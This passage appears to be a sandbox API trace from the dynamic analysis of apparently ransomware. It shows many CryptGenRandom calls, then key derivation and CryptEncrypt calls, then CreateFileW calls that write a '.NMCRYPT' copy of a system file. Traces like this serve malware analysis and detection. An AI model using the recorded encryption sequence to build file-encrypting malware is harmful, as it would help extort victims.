pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.362] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.363] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0168.364] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0168.364] CryptCreateHash (in: hProv=0x8e3880, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: phHash=0x1d444734) returned 1 [0168.364] CryptHashData (hHash=0x9ad7b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.364] CryptDeriveKey (in: hProv=0x8e3880, Algid=0x6610, hBaseData=0x9ad7b8, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad3b8) returned 1 [0168.364] CryptSetKeyParam (hKey=0x9ad3b8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0168.364] CryptSetKeyParam (hKey=0x9ad3b8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0168.364] wcslen (_String="\\\\?\\") returned 0x4 [0168.364] CryptDuplicateKey (in: hKey=0x9ad3b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad478) returned 1 [0168.364] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc.NMCRYPT" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0168.364] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 